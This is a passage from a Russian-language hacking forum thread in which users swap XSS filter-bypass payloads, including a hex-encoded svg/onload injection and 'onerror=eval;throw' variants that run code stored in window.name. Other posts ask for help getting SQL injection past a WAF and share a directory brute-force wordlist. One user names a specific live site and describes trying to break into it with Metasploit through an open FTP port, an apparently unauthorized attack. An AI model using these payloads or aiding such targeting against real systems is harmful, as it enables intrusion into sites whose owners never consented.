HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2671  
Старый 04.09.2019, 21:36
Baskin-Robbins
Guest
Сообщений: n/a
Провел на форуме:
92829

Репутация: 212
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

А чем можно заменить ()в
<script>alert(1)</script>
пробуй alert`aaa`

вот тебе пример /threads/424991/page-17

но если отработает такая штука, то алерт не нужен
 
Ответить с цитированием

  #2672  
Старый 04.09.2019, 21:48
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Цитата:
Сообщение от Baskin-Robbins  
Baskin-Robbins said:

пробуй alert`aaa`
вот тебе пример
/threads/424991/page-17
но если отработает такая штука, то алерт не нужен

Не выходя из <script>нужно выполнить xss без ;()
 
Ответить с цитированием

  #2673  
Старый 06.09.2019, 14:54
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от man474019  
man474019 said:

hi
sqli very hard WAF
can u help ?
link:
link
Charencode helps bypass "The URI you submitted has disallowed characters.", but the vector fails.
 
Ответить с цитированием

  #2674  
Старый 06.09.2019, 15:51
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

Не выходя из <script>нужно выполнить xss без ;()
Код:
Code:
document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//
 
Ответить с цитированием

  #2675  
Старый 06.09.2019, 16:45
Bo0oM
Новичок
Регистрация: 26.12.2009
Сообщений: 4
Провел на форуме:
76437

Репутация: 5
Отправить сообщение для Bo0oM с помощью ICQ
По умолчанию

Цитата:
Сообщение от crlf  
crlf said:

Код:
Code:
document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//
Код:
Code:
onerror=eval;throw'=alert\x281\x29'
Больше нравится (с предварительной записью в window.name, который передается в рамках одного окна)

Код:
Code:
onerror=eval;throw window.name
 
Ответить с цитированием

  #2676  
Старый 08.09.2019, 23:28
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Привет, поделитесь нормальным словарем для директорий, их много но всегда маловато их
 
Ответить с цитированием

  #2677  
Старый 08.09.2019, 23:49
Baskin-Robbins
Guest
Сообщений: n/a
Провел на форуме:
92829

Репутация: 212
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

Привет, поделитесь нормальным словарем для директорий, их много но всегда маловато их
миллиона тебе достаточно? много не всегда есть хорошо

Код:
Code:
https://github.com/foospidy/payloads/blob/master/owasp/dirbuster/directory-list-2.3-big.txt
 
Ответить с цитированием

  #2678  
Старый 11.09.2019, 17:26
November15
Guest
Сообщений: n/a
Провел на форуме:
767

Репутация: 0
По умолчанию

http://e-learn.i5t.ru/ можно ли ,что-либо сделать?
 
Ответить с цитированием

  #2679  
Старый 11.09.2019, 19:38
fandor9
Guest
Сообщений: n/a
Провел на форуме:
169390

Репутация: 47
По умолчанию

Цитата:
Сообщение от November15  
November15 said:

http://e-learn.i5t.ru/
можно ли ,что-либо сделать?
учиться можно, вот https://e-learn.i5t.ru/enrol/index.php?id=2 ))
 
Ответить с цитированием

  #2680  
Старый 11.09.2019, 20:32
November15
Guest
Сообщений: n/a
Провел на форуме:
767

Репутация: 0
По умолчанию

Это да,но всё же касательно сайта.Я чекнул там вроде ftp порт открыт и мне интересно как это раскрутить(через msf выдаёт ошибку ,что иньекция выполнена,но сесси нет)

Цитата:
Сообщение от fandor9  
fandor9 said:

учиться можно, вот
https://e-learn.i5t.ru/enrol/index.php?id=2
))
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ